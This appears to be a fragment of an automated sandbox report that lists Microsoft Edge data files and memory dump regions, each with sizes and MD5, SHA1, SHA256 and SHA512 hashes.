                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            3e5f2d5e4cef000b9a0f9f5a99a17ea4

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            107674aa0757d2519210fa9fe942d4ad8f6c791e

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            bdd673239b68a0ec23950d3865fb6ea0d6ca7c5bb23b05b86f80d43e5d4cc3cd

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            e60c0dbe720308303386be9f4ea2216040f7b395f0ddfc086bf2f06c3908195718d329988759d4f154487a7d93575aceb2575f40b66f1ba6ed4e4de45042e5d2

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            10108e0d8304ab9ad0db47231b2cf498

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            00cda57625358b1dc28f3553c8e251323c43d750

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f3cbb17d64eec28d6437c50e68f942f3cd230a9d5ac23586187f01a785afaf71

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            2a5edcffe562fed7ed2f89b31d6576c50028a603e1a7096bd6cdb474890a89fa19fd5a3fc7bb439290d8b4fdf94526bbeae70bf21d04c0010d2e5e22880522ad

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            16KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            ca77e22239563e605188bb4c31c90cb8

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            e0e4a304f2af3dd77b7fd70813d3bb8637f540a8

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            dc2627ff882d879862ab04c9e41d50266f8021eeea0bc01e5862feb90cf60aca

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            40b9b1f601c301c706284d17220b4722d03beb9c962fe11abcb7ff1ded24be9bcd85175f6b1a19dcf48ebf52712ce46157d95bd4bf2f2150b685479439ad8cee

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{34FD0B71-AE06-4B22-9463-2E164CE04409}.dat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            beca22ad5296703686654d0fb49ab64f

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            943eab6e12204ff00a4e90395d220c52c743c2d7

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            1ef55b7f873fc5063aa67254b23747dada4ae607561f71086c60f31109da84dd

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f58e52a6e976a129723e91430491053ebe058d5a820f868a7c247bcac8e7dfef8b543e36b6cdece47188ba849e6a1b676d19ecf4b19a6995396de764b55c9c3e

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{457C7759-F16E-4CC1-8845-C35458864F40}.dat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            2e686d1ec82d2fe58cbb8ccb4677f8d9

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6aebcbf92998dab4f96cab4805d90095ca92007a

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            a225eca7266c72eb71c1452c3227c2a05ab53c92d47b5f5da2dca6688b626538

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            28d4eca9c9d769b4713ea7b2567a1b5ed1dcccc235fdfeccaa3dcd4c1273ea529792cde862e31e7063abc54f97f732fc23001b5790150c0a74bdf500d8c9866f

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{05E66227-50BA-48E1-A496-C51EEF05AA9A}.dat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            bf687a2927dd388aac24abf6b3374437

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            3e339fb68c7d9e561f85265753681421c8d06f79

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            0f8d593764cc7dfa8bca91e9cbe418f16f1afab0e2507f961dcc0b737e847d17

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            f0e17e48aa40b656f62f1fb64f6a1304dee72db1534b141416d6dac65b0e6be1741ba5089fb63c8a75d3f191f0420edb54b8feaa7bc6f518ec6845a9b231d924

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{8F1BDF09-0584-42C8-A001-4914BBBAFAD6}.dat

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            3a5635fe257b76090fddb25e60e6bfb7

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            10c43814de4ea76e18356627be888774d734b5a1

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            f0ac634baebe12c87caa6f9183b9d2e4d35359c1bcc33501f9b80466e6f2d9a3

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            529b6969d3eb94db54cedada9969e9660cbe5d30d0e09e33e78fad40bf6995c8bdb69d78d9746610919c95206761c9dcdd6283934855fe1707815732c6a83516

                                                                                                                                                                                                          • memory/5004-42-0x000001958AEF0000-0x000001958AEF1000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/5004-39-0x000001958B1E0000-0x000001958B1E2000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/5004-0-0x0000019589E20000-0x0000019589E30000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/5004-46-0x000001958A280000-0x000001958A281000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/5004-35-0x0000019589F30000-0x0000019589F32000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            8KB

                                                                                                                                                                                                          • memory/5004-16-0x000001958A500000-0x000001958A510000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB